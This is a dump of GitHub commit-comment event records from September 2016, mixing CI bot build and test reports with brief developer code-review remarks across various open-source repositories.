{"id":"4628970671","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19203312,"position":null,"line":null,"path":null,"commit_id":"8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a","created_at":"2016-09-28T07:33:10Z","updated_at":"2016-09-28T07:33:10Z","body":"ENERGYPLUS_EXPECTED_HASH (evanweaver) - i386-Windows-7-VisualStudio-12: OK (2408 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.37%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T07:33:10Z"}
{"id":"4628977208","type":"CommitCommentEvent","actor":{"login":"elpaso"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19203331,"position":null,"line":null,"path":null,"commit_id":"89d4998510bccbf7817671171c25cf71deab6f9a","created_at":"2016-09-28T07:34:55Z","updated_at":"2016-09-28T07:34:55Z","body":"Oh, sorry, I thought it was removed when the switch to qt5/Py3 was made.\r\n\r\nBut generally speaking, I believe that we should think twice before removing a test and if it is really necessary, it should be done with a bit more respect for the test author and maybe saying it loud on the mailing list.\r\n\r\nYou must know very well that writing tests takes time and it's not the most exciting activity, the `rm -rf` (or blacklist either) approach in this case is not the best way to proceed in order to motivate volunteers to write and maintain tests.\r\n\r\nIn general, @dakcarto also agreed that we should remove the older server scripts that is much more complex to maintain in favour of the new one which is completely python based.\r\n\r\nIf the new server script is not reliable maybe we can find a way to improve its reliability, I wasn't aware of any problem with that.\r\n"}},"created_at":"2016-09-28T07:34:55Z"}
{"id":"4628977549","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/Pale-Moon"},"payload":{"comment":{"id":19203334,"position":null,"line":null,"path":null,"commit_id":"9aab4b803034dbd503fe0477c596c890e6ab83d1","created_at":"2016-09-28T07:35:00Z","updated_at":"2016-09-28T07:35:00Z","body":"Oh stupid Mozilla renaming strikes again.\r\nShould be nsRefPtr<>"}},"created_at":"2016-09-28T07:35:00Z"}
{"id":"4628977690","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19203335,"position":null,"line":null,"path":null,"commit_id":"f3d8e0cb38469e6ddadfac0a221a4272a058df9b","created_at":"2016-09-28T07:35:03Z","updated_at":"2016-09-28T07:35:03Z","body":"saw approval from jedmccaleb\nat https://github.com/vogel/stellar-core/commit/f3d8e0cb38469e6ddadfac0a221a4272a058df9b"}},"created_at":"2016-09-28T07:35:03Z"}
{"id":"4628977703","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19203336,"position":null,"line":null,"path":null,"commit_id":"f3d8e0cb38469e6ddadfac0a221a4272a058df9b","created_at":"2016-09-28T07:35:03Z","updated_at":"2016-09-28T07:35:03Z","body":"merging vogel/stellar-core/xdr-error-handling = f3d8e0cb into auto"}},"created_at":"2016-09-28T07:35:03Z"}
{"id":"4628977726","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19203337,"position":null,"line":null,"path":null,"commit_id":"f3d8e0cb38469e6ddadfac0a221a4272a058df9b","created_at":"2016-09-28T07:35:04Z","updated_at":"2016-09-28T07:35:04Z","body":"vogel/stellar-core/xdr-error-handling = f3d8e0cb merged ok, testing candidate = 3e754c33"}},"created_at":"2016-09-28T07:35:04Z"}
{"id":"4628978409","type":"CommitCommentEvent","actor":{"login":"jedmccaleb"},"repo":{"name":"vogel/stellar-core"},"payload":{"comment":{"id":19203340,"position":null,"line":null,"path":null,"commit_id":"da39a99e542db4f41cb3618da42cd4b1fb09abc9","created_at":"2016-09-28T07:35:15Z","updated_at":"2016-09-28T07:35:15Z","body":"r+"}},"created_at":"2016-09-28T07:35:15Z"}
{"id":"4628982609","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19203347,"position":null,"line":null,"path":null,"commit_id":"f73dac30cdbc7da7cc6db1ec2be422e61c57c42e","created_at":"2016-09-28T07:36:21Z","updated_at":"2016-09-28T07:36:21Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 272](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1246&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Compilation error: Xbim.Geometry.Engine\\Xbim.Geometry.Engine.vcxproj (new) Build time: 00:12:31"}},"created_at":"2016-09-28T07:36:21Z"}
{"id":"4628984604","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19203355,"position":38,"line":164,"path":"resources/qml/MonitorButton.qml","commit_id":"f4d13713a2206df714fbe6c0ed5dac070711ba15","created_at":"2016-09-28T07:36:51Z","updated_at":"2016-09-28T07:36:51Z","body":"I see. Added a check for that in 99f53cb8322e07f1ff94195e44ecbcde0b82e841 then."}},"created_at":"2016-09-28T07:36:51Z"}
{"id":"4628984908","type":"CommitCommentEvent","actor":{"login":"sedubois"},"repo":{"name":"este/este"},"payload":{"comment":{"id":19203356,"position":20,"line":20,"path":"src/common/lib/redux-firebase/firebase.js","commit_id":"55124e22f1148886721ee95689aece95965cdf68","created_at":"2016-09-28T07:36:56Z","updated_at":"2016-09-28T07:36:56Z","body":"Apollo client is realtime, and AFAIK Relay offers something similar or if not enough, Relay 2 will. \r\n\r\nGoogle cloud is hard to beat, but there are GraphQL backends popping up, like reindex.io, dgraph.io, graph.cool.\r\n\r\nOffline seems the trickiest. Not out of the box indeed, but maybe something can be assembled with things like redux-persist (in Apollo's case) etc. I'd be interested in seeing what's possible.\r\n\r\nSo yes GraphQL/Relay still feels a little like \"version 1\" (which it is), but can offer something that Firebase doesn't, which is a very powerful query language, type safety, self-documentation, normalized graph cache, etc. Probably at least a good idea to keep an eye on, especially for a project using React views."}},"created_at":"2016-09-28T07:36:56Z"}
{"id":"4628986767","type":"CommitCommentEvent","actor":{"login":"foosel"},"repo":{"name":"foosel/OctoPrint"},"payload":{"comment":{"id":19203360,"position":null,"line":null,"path":null,"commit_id":"d9e3553c7c4e18646f1d360822eeb07ba6586e95","created_at":"2016-09-28T07:37:26Z","updated_at":"2016-09-28T07:37:26Z","body":"Because I'm evil. >:)\r\n\r\nNah, actually because when documenting the files JS client I couldn't find any usage in the whole code base for those two methods anymore and hence thought they were dead code. Sorry! Will revert that and document them. I'm not too happy with the names yet though, could you live with a rename?"}},"created_at":"2016-09-28T07:37:26Z"}
{"id":"4628986837","type":"CommitCommentEvent","actor":{"login":"bc-mkatz"},"repo":{"name":"bigcommerce-labs/slate"},"payload":{"comment":{"id":19203361,"position":null,"line":null,"path":null,"commit_id":"f54d35ea85dd341cf72f5c236d8122a87223f271","created_at":"2016-09-28T07:37:27Z","updated_at":"2016-09-28T07:37:27Z","body":"This finishes grooming the \"Products\" section in the left nav."}},"created_at":"2016-09-28T07:37:27Z"}
{"id":"4628987767","type":"CommitCommentEvent","actor":{"login":"saadbadger"},"repo":{"name":"saadbadger/Delivery-Dispatch"},"payload":{"comment":{"id":19203364,"position":2,"line":2,"path":"README.md","commit_id":"25dcffd86155fa7d1639ea62c594814d6220101f","created_at":"2016-09-28T07:37:42Z","updated_at":"2016-09-28T07:37:42Z","body":"New"}},"created_at":"2016-09-28T07:37:42Z"}
{"id":"4629004880","type":"CommitCommentEvent","actor":{"login":"jrieken"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19203386,"position":30,"line":643,"path":"src/vs/vscode.d.ts","commit_id":"7f0e2adacf4a8740bda8b0a4049b34cb670eb30b","created_at":"2016-09-28T07:42:13Z","updated_at":"2016-09-28T07:42:13Z","body":"🙈 breaking? Shouldn't it stay `TextEditorLineNumbersStyle | boolean`"}},"created_at":"2016-09-28T07:42:13Z"}
{"id":"4629005395","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":19203389,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-28T07:42:22Z","updated_at":"2016-09-28T07:42:22Z","body":"Why do this?"}},"created_at":"2016-09-28T07:42:22Z"}
{"id":"4629010948","type":"CommitCommentEvent","actor":{"login":"jedmccaleb"},"repo":{"name":"vogel/stellar-core"},"payload":{"comment":{"id":19203395,"position":null,"line":null,"path":null,"commit_id":"bff068c1cb6507e480cd7f473c352a3877626b03","created_at":"2016-09-28T07:43:47Z","updated_at":"2016-09-28T07:43:47Z","body":"r+"}},"created_at":"2016-09-28T07:43:47Z"}
{"id":"4629013941","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19203398,"position":null,"line":null,"path":null,"commit_id":"89d4998510bccbf7817671171c25cf71deab6f9a","created_at":"2016-09-28T07:44:32Z","updated_at":"2016-09-28T07:44:32Z","body":"We should probably have a method to blacklist tests in a different way.\r\n\r\nWhen blacklisting them, they should still be executed but their success/failure noted somewhere and output logged. This way they wouldn't give false alarms on travis ci (which sometimes affect credibility of test results) but still allow for investigating the real source of troubles."}},"created_at":"2016-09-28T07:44:32Z"}
{"id":"4629015236","type":"CommitCommentEvent","actor":{"login":"Algatux"},"repo":{"name":"Algatux/influxdb-bundle"},"payload":{"comment":{"id":19203404,"position":null,"line":null,"path":null,"commit_id":"4a2d563c535a42f131822bdaa63f2c832c768e61","created_at":"2016-09-28T07:44:53Z","updated_at":"2016-09-28T07:44:53Z","body":"I Changed my mind I think it's better to include this change in an eventual 3.0 version with some new functionalities @Soullivaneuh "}},"created_at":"2016-09-28T07:44:53Z"}
{"id":"4629023191","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19203436,"position":null,"line":null,"path":null,"commit_id":"aa1b89aec2315509207144f6e0f84b28ddb5ec80","created_at":"2016-09-28T07:46:52Z","updated_at":"2016-09-28T07:46:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1184](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14423&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-28T07:46:52Z"}
{"id":"4629031503","type":"CommitCommentEvent","actor":{"login":"Hotrian"},"repo":{"name":"Hotrian/VROverlay"},"payload":{"comment":{"id":19203471,"position":null,"line":null,"path":null,"commit_id":"6a7a48ffd41d71bf7a63b493b28d3cc375452208","created_at":"2016-09-28T07:48:57Z","updated_at":"2016-09-28T07:48:57Z","body":"missed* derp.."}},"created_at":"2016-09-28T07:48:57Z"}
{"id":"4629032487","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":19203476,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-28T07:49:13Z","updated_at":"2016-09-28T07:49:13Z","body":"Why do this?"}},"created_at":"2016-09-28T07:49:13Z"}
{"id":"4629032537","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19203477,"position":null,"line":null,"path":null,"commit_id":"a8858981cb5b2a7903f0453a30acae23e8a5646c","created_at":"2016-09-28T07:49:14Z","updated_at":"2016-09-28T07:49:14Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 36](http://munit-050:8112/tc/viewLog.html?buildId=99136&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-28T07:49:14Z"}
{"id":"4629034925","type":"CommitCommentEvent","actor":{"login":"idma88"},"repo":{"name":"idma88/site-req"},"payload":{"comment":{"id":19203485,"position":null,"line":null,"path":null,"commit_id":"e5dbd274aae26a9411c169a3d8fa7cd128ec280c","created_at":"2016-09-28T07:49:50Z","updated_at":"2016-09-28T07:49:50Z","body":"Done [issue #12]"}},"created_at":"2016-09-28T07:49:50Z"}
{"id":"4629035416","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19203488,"position":26,"line":321,"path":"cura/Settings/ExtruderManager.py","commit_id":"4bb6ddaf28ae2f5a93d59d25fa479d594aff1d5c","created_at":"2016-09-28T07:49:57Z","updated_at":"2016-09-28T07:49:57Z","body":"Bit of documentation missing here. A list of ... ? "}},"created_at":"2016-09-28T07:49:57Z"}
{"id":"4629038318","type":"CommitCommentEvent","actor":{"login":"maciekgajewski"},"repo":{"name":"maciekgajewski/c-excercises"},"payload":{"comment":{"id":19203497,"position":null,"line":null,"path":null,"commit_id":"f4c743de5eccc319392cb5fc5c2887adad11949f","created_at":"2016-09-28T07:50:39Z","updated_at":"2016-09-28T07:50:39Z","body":"please ,create a pull request with these changes"}},"created_at":"2016-09-28T07:50:39Z"}
{"id":"4629039499","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19203504,"position":12,"line":604,"path":"cura/Settings/MachineManager.py","commit_id":"4bb6ddaf28ae2f5a93d59d25fa479d594aff1d5c","created_at":"2016-09-28T07:50:56Z","updated_at":"2016-09-28T07:50:56Z","body":"Why blur right away? In the old code we did it once we figured out we actually had to do something. Is there a specific reason why you changed this? "}},"created_at":"2016-09-28T07:50:56Z"}
{"id":"4629039740","type":"CommitCommentEvent","actor":{"login":"zzpqhy"},"repo":{"name":"Chyroc/WechatSogou"},"payload":{"comment":{"id":19203507,"position":null,"line":null,"path":null,"commit_id":"b10ef41188d74398191f708ac6c08619269dafc9","created_at":"2016-09-28T07:50:59Z","updated_at":"2016-09-28T07:50:59Z","body":"历史文章的抓取要怎么实现？"}},"created_at":"2016-09-28T07:50:59Z"}
{"id":"4629042527","type":"CommitCommentEvent","actor":{"login":"davidfowl"},"repo":{"name":"MachUpskillingFY17/JabbR-Core"},"payload":{"comment":{"id":19203516,"position":null,"line":null,"path":null,"commit_id":"a71f765dec37b9371ec340c06de9360c86aea644","created_at":"2016-09-28T07:51:40Z","updated_at":"2016-09-28T07:51:40Z","body":"Finally! I always hated these names..."}},"created_at":"2016-09-28T07:51:40Z"}
{"id":"4629045081","type":"CommitCommentEvent","actor":{"login":"HMBSbige"},"repo":{"name":"HMBSbige/2016-DHU-data-structure"},"payload":{"comment":{"id":19203524,"position":null,"line":null,"path":null,"commit_id":"c88a2cd47e93d4718537813ba8cb8aa79e5c5af9","created_at":"2016-09-28T07:52:16Z","updated_at":"2016-09-28T07:52:16Z","body":"D"}},"created_at":"2016-09-28T07:52:16Z"}
{"id":"4629047225","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19203531,"position":9,"line":82,"path":"semantics.json","commit_id":"69d75abd43472fabd15f830765d029387801e0ce","created_at":"2016-09-28T07:52:48Z","updated_at":"2016-09-28T07:52:48Z","body":"Ah, of course, I see we've disabled the error message for missing properties that are required: [95a0b00](https://github.com/h5p/h5p-php-library/commit/95a0b000db5eb6ae4fa68ac7eca1089c7c9369aa)"}},"created_at":"2016-09-28T07:52:48Z"}
{"id":"4629047628","type":"CommitCommentEvent","actor":{"login":"vishal1shukla2"},"repo":{"name":"krishhub/Students"},"payload":{"comment":{"id":19203534,"position":9,"line":34,"path":"app/components/students/all-students.controller.js","commit_id":"e0ab5e6435ba9b1626e6b6b3eed0c10c84b9b63d","created_at":"2016-09-28T07:52:55Z","updated_at":"2016-09-28T07:52:55Z","body":"Initially, to verify angular's understanding, you can keep writing short comments - to explain your understanding.. e.g. here you could write - \"This will be callled when user closes the modal. Because we are not passing any data or we are not interested in handling modal close in special way, we are not doing anything here.\""}},"created_at":"2016-09-28T07:52:55Z"}
{"id":"4629049548","type":"CommitCommentEvent","actor":{"login":"luka5z"},"repo":{"name":"jenkinsci/docker"},"payload":{"comment":{"id":19203540,"position":null,"line":null,"path":null,"commit_id":"bbbb76d46b8ea934fdec9f2ed0ebd49a923496d4","created_at":"2016-09-28T07:53:21Z","updated_at":"2016-09-28T07:53:21Z","body":"Wouldn't `xargs -r` option solve this?\r\n\r\n```\r\n       --no-run-if-empty\r\n       -r     If the standard input does not contain any nonblanks, do not run the command.  Normally, the command is run once even if there\r\n              is no input.  This option is a GNU extension.\r\n\r\n```"}},"created_at":"2016-09-28T07:53:21Z"}
{"id":"4629049628","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19203541,"position":138,"line":663,"path":"cura/Settings/MachineManager.py","commit_id":"4bb6ddaf28ae2f5a93d59d25fa479d594aff1d5c","created_at":"2016-09-28T07:53:22Z","updated_at":"2016-09-28T07:53:22Z","body":"This lookup could very well fail. A bit of defensive coding (check if list is empty) would be wise here. "}},"created_at":"2016-09-28T07:53:22Z"}
{"id":"4629051054","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19203546,"position":143,"line":668,"path":"cura/Settings/MachineManager.py","commit_id":"4bb6ddaf28ae2f5a93d59d25fa479d594aff1d5c","created_at":"2016-09-28T07:53:43Z","updated_at":"2016-09-28T07:53:43Z","body":"Remove unused code."}},"created_at":"2016-09-28T07:53:43Z"}
{"id":"4629052240","type":"CommitCommentEvent","actor":{"login":"BasThomas"},"repo":{"name":"SwiftWeekly/swiftweekly.github.io"},"payload":{"comment":{"id":19203549,"position":null,"line":null,"path":null,"commit_id":"3517102c1c586a909e985cc05d58518e3ced26c8","created_at":"2016-09-28T07:54:01Z","updated_at":"2016-09-28T07:54:01Z","body":"😂"}},"created_at":"2016-09-28T07:54:01Z"}
{"id":"4629053207","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":19203551,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-28T07:54:15Z","updated_at":"2016-09-28T07:54:15Z","body":"Why do this?"}},"created_at":"2016-09-28T07:54:15Z"}
{"id":"4629053787","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19203552,"position":null,"line":null,"path":null,"commit_id":"45280bf91ab3987b2e4e49617b693d09b1b17085","created_at":"2016-09-28T07:54:23Z","updated_at":"2016-09-28T07:54:23Z","body":"I figured it out by switching the order of d1 and d2. Then d2 passed and\nand d1 failed.\n\nOn Tue, Sep 27, 2016 at 10:37 PM, Jacques Carette <notifications@github.com>\nwrote:\n\n> Oh, now I see why d1 passed but none of the others! Now I also remember\n> why I hate imperative programming so... Global state is just evil,\n> especially when it's not obvious that it is there.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/45280bf91ab3987b2e4e49617b693d09b1b17085#commitcomment-19201272>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASYo9bT2uGP4WlM8JqIFU8P26vDG5n9fks5qudLwgaJpZM4KIW31>\n> .\n>\n"}},"created_at":"2016-09-28T07:54:23Z"}
{"id":"4629054227","type":"CommitCommentEvent","actor":{"login":"wsnipex"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":19203553,"position":76,"line":118,"path":"project/cmake/modules/FindLibDvd.cmake","commit_id":"45c684c5f30676032b5d5f08a46fee0ced905812","created_at":"2016-09-28T07:54:29Z","updated_at":"2016-09-28T07:54:29Z","body":"right, seem there is something missing here, while autotools build is correct.\r\nwill try to find some time to fix it.\r\n\r\nIn the meantime, https://github.com/wsnipex/xbmc/commit/03a47222d3f8b686340fd5ea9b56406a007a3dc1 should workaround the issue for unified deps platforms, since it avoids recompiling libdvd if we already have it in depends."}},"created_at":"2016-09-28T07:54:29Z"}
{"id":"4629055788","type":"CommitCommentEvent","actor":{"login":"ManuelMJ10"},"repo":{"name":"Denisse-12/Cafe58"},"payload":{"comment":{"id":19203560,"position":11,"line":11,"path":"AppTemplate/AppTemplate/App.Entities/Ingredientes.cs","commit_id":"08fdbf47cf261996ba8f33035e67eebccf6da821","created_at":"2016-09-28T07:54:51Z","updated_at":"2016-09-28T07:54:51Z","body":"A\r\n"}},"created_at":"2016-09-28T07:54:51Z"}
{"id":"4629056570","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19203561,"position":null,"line":null,"path":null,"commit_id":"f3d8e0cb38469e6ddadfac0a221a4272a058df9b","created_at":"2016-09-28T07:55:03Z","updated_at":"2016-09-28T07:55:03Z","body":"all tests pass:\nsuccess: https://travis-ci.org/stellar/stellar-core/builds/163326361\n"}},"created_at":"2016-09-28T07:55:03Z"}
{"id":"4629057079","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19203562,"position":157,"line":682,"path":"cura/Settings/MachineManager.py","commit_id":"4bb6ddaf28ae2f5a93d59d25fa479d594aff1d5c","created_at":"2016-09-28T07:55:11Z","updated_at":"2016-09-28T07:55:11Z","body":"Bit of a tongue twister. Unfortunately I don't know a better name for this either :( "}},"created_at":"2016-09-28T07:55:11Z"}
{"id":"4629062229","type":"CommitCommentEvent","actor":{"login":"Rayman"},"repo":{"name":"tue-robotics/tue-env"},"payload":{"comment":{"id":19203576,"position":null,"line":null,"path":null,"commit_id":"9358f19d04a66cae80b2c1a43a84497408bb87a3","created_at":"2016-09-28T07:56:22Z","updated_at":"2016-09-28T07:56:22Z","body":":+1: "}},"created_at":"2016-09-28T07:56:22Z"}
{"id":"4629063759","type":"CommitCommentEvent","actor":{"login":"drew-r"},"repo":{"name":"drew-r/cordova-plugin-background-geolocation"},"payload":{"comment":{"id":19203578,"position":null,"line":null,"path":null,"commit_id":"53cab31ffd9e47ea6d8eac77e67d127386ed982d","created_at":"2016-09-28T07:56:44Z","updated_at":"2016-09-28T07:56:44Z","body":"I forked and removed this as it didn't fit with our build process more than anything else.\r\nIf I was going to work on fixing the crash I reported in the other issue I will look at uour fix for https://github.com/transistorsoft/cordova-background-geolocation-lt/issues/52\r\nAssuming it got merged?"}},"created_at":"2016-09-28T07:56:44Z"}
{"id":"4629066153","type":"CommitCommentEvent","actor":{"login":"guillaumebort"},"repo":{"name":"AlexGalays/loop"},"payload":{"comment":{"id":19203584,"position":null,"line":null,"path":null,"commit_id":"40fbcbeee46f7c1cc7a46be716cdc460cd78fc89","created_at":"2016-09-28T07:57:17Z","updated_at":"2016-09-28T07:57:17Z","body":"I think I tried to do this before, but without using `require-like` because I was not aware it existed. Don't remember why I cancelled this feature, probably because it was not working :) But looks good to me, can you open a pull request?"}},"created_at":"2016-09-28T07:57:17Z"}
{"id":"4629069399","type":"CommitCommentEvent","actor":{"login":"krishhub"},"repo":{"name":"krishhub/Students"},"payload":{"comment":{"id":19203590,"position":9,"line":34,"path":"app/components/students/all-students.controller.js","commit_id":"e0ab5e6435ba9b1626e6b6b3eed0c10c84b9b63d","created_at":"2016-09-28T07:58:02Z","updated_at":"2016-09-28T07:58:02Z","body":"right! will do that now onwards!"}},"created_at":"2016-09-28T07:58:02Z"}
{"id":"4629069497","type":"CommitCommentEvent","actor":{"login":"jnioche"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19203591,"position":58,"line":58,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T07:58:03Z","updated_at":"2016-09-28T07:58:03Z","body":"Good point, had forgotten about it. For that one, we'd need to decouple the cache from the count anyway. The map with the counts needs to be handled from the ack and fail methods, throttling with values persisted post ack would be problematic."}},"created_at":"2016-09-28T07:58:03Z"}
{"id":"4629072000","type":"CommitCommentEvent","actor":{"login":"slorion"},"repo":{"name":"slorion/nlight"},"payload":{"comment":{"id":19203595,"position":null,"line":null,"path":null,"commit_id":"98d3952f0dda8be4182f978c11605f4a89b4615d","created_at":"2016-09-28T07:58:35Z","updated_at":"2016-09-28T07:58:35Z","body":"Fixes #6 "}},"created_at":"2016-09-28T07:58:35Z"}
{"id":"4629072661","type":"CommitCommentEvent","actor":{"login":"jnioche"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19203599,"position":72,"line":72,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T07:58:44Z","updated_at":"2016-09-28T07:58:44Z","body":"won't happen as we have a maxduration"}},"created_at":"2016-09-28T07:58:44Z"}
{"id":"4629072685","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19203600,"position":9,"line":82,"path":"semantics.json","commit_id":"69d75abd43472fabd15f830765d029387801e0ce","created_at":"2016-09-28T07:58:44Z","updated_at":"2016-09-28T07:58:44Z","body":"It seems the optional property now is only to determine if the red star should be displayed or not, and the boolean doesn't have any red star ever, i.e. the 'optional' property makes no difference on boolean fields. I updated the semantics: b1c2e192b0426c6a642f646d5177eb76e18cc3a4"}},"created_at":"2016-09-28T07:58:44Z"}
{"id":"4629075174","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19203604,"position":null,"line":null,"path":null,"commit_id":"a8858981cb5b2a7903f0453a30acae23e8a5646c","created_at":"2016-09-28T07:59:17Z","updated_at":"2016-09-28T07:59:17Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 36](http://munit-050:8112/tc/viewLog.html?buildId=99136&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:3"}},"created_at":"2016-09-28T07:59:17Z"}
{"id":"4629076740","type":"CommitCommentEvent","actor":{"login":"tomgross"},"repo":{"name":"tomgross/training"},"payload":{"comment":{"id":19203608,"position":45,"line":235,"path":"solr-training/advanced-topics.rst","commit_id":"929eb9f07449115f044ee900694267cfe296f7e1","created_at":"2016-09-28T07:59:38Z","updated_at":"2016-09-28T07:59:38Z","body":"I don't have too much experience with Elasticsearch. I asked @zopyx and this is his opinion. I think he refers to readability. Since you do this part in the training it is up to you to change the text to fit your opinions and experience 😉 "}},"created_at":"2016-09-28T07:59:38Z"}
{"id":"4629078283","type":"CommitCommentEvent","actor":{"login":"jnioche"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19203612,"position":103,"line":103,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T08:00:00Z","updated_at":"2016-09-28T08:00:00Z","body":"probably need an explicit call to super.prepare() from the subclasses"}},"created_at":"2016-09-28T08:00:00Z"}
{"id":"4629078567","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19203613,"position":null,"line":null,"path":null,"commit_id":"f3d8e0cb38469e6ddadfac0a221a4272a058df9b","created_at":"2016-09-28T08:00:04Z","updated_at":"2016-09-28T08:00:04Z","body":"fast-forwarding master to auto = 3e754c33"}},"created_at":"2016-09-28T08:00:04Z"}
{"id":"4629080295","type":"CommitCommentEvent","actor":{"login":"magnetik"},"repo":{"name":"manialib/formatting"},"payload":{"comment":{"id":19203615,"position":5,"line":45,"path":"src/Manialib/Formatting/Converter/Html.php","commit_id":"4f5aae9e0ba5da87cf3633df5ad2f3cda2ea3682","created_at":"2016-09-28T08:00:25Z","updated_at":"2016-09-28T08:00:25Z","body":"`parse_url($this->link, PHP_URL_SCHEME)` retourne null si il n'y en a pas"}},"created_at":"2016-09-28T08:00:25Z"}
{"id":"4629082309","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19203624,"position":null,"line":null,"path":null,"commit_id":"aa1b89aec2315509207144f6e0f84b28ddb5ec80","created_at":"2016-09-28T08:00:53Z","updated_at":"2016-09-28T08:00:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1184](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14423&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:14:01"}},"created_at":"2016-09-28T08:00:53Z"}
{"id":"4629083563","type":"CommitCommentEvent","actor":{"login":"sreenivaskat"},"repo":{"name":"sreenivaskat/Test"},"payload":{"comment":{"id":19203627,"position":null,"line":null,"path":null,"commit_id":"499329e8f624b75f1e8bc0b4b0bb606eb3d3c80c","created_at":"2016-09-28T08:01:10Z","updated_at":"2016-09-28T08:01:10Z","body":"this is my first code "}},"created_at":"2016-09-28T08:01:10Z"}
